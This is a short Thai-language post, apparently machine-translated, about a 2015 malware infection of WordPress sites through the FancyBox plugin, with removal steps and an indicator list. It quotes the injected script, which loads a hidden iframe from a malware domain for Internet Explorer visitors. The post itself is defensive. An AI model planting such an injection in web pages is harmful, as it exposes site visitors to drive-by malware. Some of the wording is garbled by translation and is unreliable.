สัปดาห์ก่อนหน้านี้จำนวนของเว็บไซต์และบล็อก WordPressได้รับคำเตือนจาก การติดเชื้อมัลแวร์ ตลอด Google เว็บมาสเตอร์.
ปัญหาที่เกิดขึ้นว่า Google เว็บมาสเตอร์ เรียกว่าคือการปรากฏตัวของการให้ รหัส / ต้นฉบับ iframe มัลแวร์ หน้าเว็บของแหล่งที่มา
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>
ดูเหมือนว่ามันเป็น ความอ่อนแอ a เสียบเข้าไปacquis FancyBox สำหรับ WordPress ซึ่งจนถึงเมื่อวานนี้ (05.02.2015) ไม่ได้รับการปรับปรุงมาเป็นเวลานาน
การแก้ปัญหานี้และ ฆ่าเชื้อไวรัสเว็บไซต์ กับมัลแวร์นี้ค่อนข้างง่าย
1. ปิดใช้งานปลั๊กอิน FancyBox
2 ลบไฟล์ปลั๊กอิน FancyBox จากเซิร์ฟเวอร์ (ผ่านทาง FTP)
3. ติดตั้งปลั๊กอินเวอร์ชันใหม่ (Fancybox 3.0.4)
FancyBox สำหรับ WordPress 3.0.4
- เปลี่ยนชื่อการตั้งค่าที่ได้รับผลกระทบจากปัญหาด้านความปลอดภัยที่กล่าวถึงใน 3.0.3 การดำเนินการนี้ควรหยุดโค้ดที่เป็นอันตรายไม่ให้ปรากฏบนไซต์ที่มีปลั๊กอินอยู่ updated โดยไม่ต้องลบรหัสที่เป็นอันตราย
FancyBox สำหรับ WordPress 3.0.3
- แก้ไขปัญหาการรักษาความปลอดภัย.
ข้อมูลมัลแวร์:
ประเภท: Iframe เปลี่ยนเส้นทาง
TARGET: WordPress แฟนซีบ็อกซ์
DOMAIN มัลแวร์: 203koko.eu
มัลแวร์ URI: http://203koko.eu/hjnfh/ipframe2.php
มัลแวร์ RAW รหัส:
มัลแวร์เขียน: if (navigator.userAgent.match(/msie/i)) { document.write(‘
ลบมัลแวร์ออกจาก .ของคุณ WordPress เว็บไซต์.